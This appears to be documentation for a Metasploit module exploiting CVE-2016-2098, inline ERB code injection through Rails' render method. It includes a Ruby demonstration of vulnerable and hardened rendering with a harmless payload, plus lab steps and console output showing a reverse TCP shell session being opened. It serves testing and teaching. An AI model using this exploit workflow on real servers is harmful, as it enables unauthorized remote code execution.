rails_actionpack_inline_exec is a module that exploits unsafe use of the render method in Action Pack (CVE-2016-2098).
Applications that pass unverified user input to the render method in a controller
or view may be vulnerable to code injection: the injected input is evaluated as inline ERB on the server.
Vulnerable Application
Action Pack versions prior to 3.2.22.2, 4.1.14.2, and 4.2.5.2 use unsafe dynamic rendering.
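To make the "unsafe dynamic rendering" concrete, here is an added example (not Action Pack's code and not from the Metasploit module) that models the dispatch the page describes: a String passed to render names a template, but a Hash with an inline key is evaluated as ERB. It assumes, as the module's "Sending inline code to parameter: id" output suggests, that the attacker reaches the Hash branch by submitting a nested parameter such as id[inline]=...; parse_nested_query, TEMPLATES, render_vulnerable and render_hardened are illustrative names. The payload evaluates 7 * 191 rather than running a command so the example is safe to execute.

```ruby
require 'erb'
require 'cgi'

# Added example: minimal model of why `render params[:id]` is exploitable.
# Not Action Pack's implementation; a sketch of the same dispatch logic.

# Turn "id[inline]=..." into {"id" => {"inline" => "..."}}, the way Rack
# builds nested params for Rails (simplified: one nesting level, string keys).
def parse_nested_query(qs)
  params = {}
  qs.split('&').each do |pair|
    k, v = pair.split('=', 2).map { |s| CGI.unescape(s.to_s) }
    if (m = k.match(/\A(\w+)\[(\w+)\]\z/))
      (params[m[1]] ||= {})[m[2]] = v
    else
      params[k] = v
    end
  end
  params
end

# Constructed stand-in for the application's view templates.
TEMPLATES = { 'show' => 'Showing record', 'index' => 'Listing records' }.freeze

# Vulnerable pattern: whatever came out of params is handed straight to render.
# A String selects a template; a Hash carrying "inline" is evaluated as ERB,
# so an attacker who can make params['id'] a Hash executes Ruby on the server.
def render_vulnerable(arg)
  case arg
  when String
    TEMPLATES.fetch(arg) { raise ArgumentError, "missing template #{arg}" }
  when Hash
    raise ArgumentError, 'unsupported render options' unless arg.key?('inline')
    ERB.new(arg['inline']).result(binding)
  else
    raise ArgumentError, 'bad render argument'
  end
end

# Hardened pattern: request-derived data is only ever a template *name*, and
# that name is checked against a fixed allow-list before rendering.
def render_hardened(arg)
  raise ArgumentError, 'render target must be a template name' unless arg.is_a?(String)
  TEMPLATES.fetch(arg) { raise ArgumentError, "unknown template #{arg}" }
end

# Simulate a controller action: parse the query string, render params['id'].
# Returns the rendered body, or :blocked when render refuses the input.
def handle_request(query, renderer)
  params = parse_nested_query(query)
  renderer.call(params['id'])
rescue ArgumentError
  :blocked
end

# Constructed requests: a legitimate one and the inline-ERB injection.
BENIGN_QUERY  = 'id=show'
EXPLOIT_QUERY = 'id[inline]=' + CGI.escape('<%= 7 * 191 %>')

if __FILE__ == $PROGRAM_NAME
  puts handle_request(BENIGN_QUERY,  method(:render_vulnerable))  # Showing record
  puts handle_request(EXPLOIT_QUERY, method(:render_vulnerable))  # 1337 (ERB ran)
  puts handle_request(EXPLOIT_QUERY, method(:render_hardened))    # blocked
end
```

The fix in the patched Action Pack releases is on the framework side; at the application level the durable rule is the one render_hardened shows: never pass a params value (or anything that can become a Hash) to render, only a validated template name.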
Verification Steps
Assuming you have the right requirements to run a Rails server, you can use the following fork to set up the vulnerable server for testing:
- Do: git clone https://github.com/wchen-r7/dh-CVE_2016_2098.git
- Do: bundle install
- Do: rails s -b 0.0.0.0
- Start msfconsole
- Do: use exploit/multi/http/rails_actionpack_inline_exec
- Do: set RHOST [rails server IP]
- Do: set RPORT 3000 (3000 is the default port for the Rails server)
- Do: set TARGETURI /exploits
- Configure the rest of the options (for the module or the payload)
- Do: exploit, and you should get a session:
msf exploit(rails_actionpack_inline_exec) > run
[*] Started reverse TCP handler on 192.168.146.1:4444
[*] Sending inline code to parameter: id
[*] Command shell session 1 opened (192.168.146.1:4444 -> 192.168.146.161:56661) at 2016-07-07 15:56:00 -0500
Options
To use this module, you must manually discover the correct values for these datastore options:
TARGETURI
The path to a vulnerable Ruby on Rails application.
TARGETPARAM
The target parameter to inject with inline code.